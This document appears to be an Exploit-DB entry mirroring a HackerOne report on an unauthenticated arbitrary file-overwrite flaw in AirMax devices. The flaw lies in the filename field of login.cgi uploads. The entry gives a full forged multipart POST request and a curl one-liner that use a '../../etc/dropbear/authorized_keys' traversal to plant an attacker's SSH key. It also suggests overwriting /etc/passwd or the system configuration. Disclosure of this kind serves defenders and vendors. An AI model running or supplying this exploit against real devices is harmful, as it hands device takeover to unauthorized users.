36 lines
No EOL
1.8 KiB
Text
36 lines
No EOL
1.8 KiB
Text
EDB-Note Source: https://hackerone.com/reports/73480
|
|
|
|
Vulnerability
|
|
|
|
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
|
|
Example
|
|
|
|
Consider the following request:
|
|
|
|
POST https://192.168.1.20/login.cgi HTTP/1.1
|
|
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
|
|
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
|
|
Content-Length: 773
|
|
User-Agent: Jakarta Commons-HttpClient/3.1
|
|
Host: 192.168.1.20
|
|
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
|
|
|
|
-----------------------------72971515916103336881230390860
|
|
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
|
|
Content-Type: application/vnd.ms-publisher
|
|
|
|
{{Your Public Key HERE}}
|
|
-----------------------------72971515916103336881230390860--
|
|
|
|
The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
|
|
Consequences
|
|
|
|
It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
|
|
|
|
|
|
Reproducing
|
|
|
|
With a simple command:
|
|
curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
|
|
|
|
Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg. |